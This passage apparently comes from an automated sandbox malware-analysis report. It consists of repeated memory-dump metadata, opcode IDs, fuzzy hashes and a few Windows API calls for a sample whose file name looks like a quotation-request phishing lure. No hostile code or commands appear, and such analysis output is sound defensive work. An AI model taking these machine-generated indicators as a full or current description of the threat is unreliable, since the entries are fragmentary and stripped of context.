                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                  • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                  • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                  • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                  • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                  • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                  • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                  • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                  • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                  • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                  • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                  • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                  • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                  • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                  • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                  • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                                  • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                  • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                  • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                                  • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                  • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                  • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                                  • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                  • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                  • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                  • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                  • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                  • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                  • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9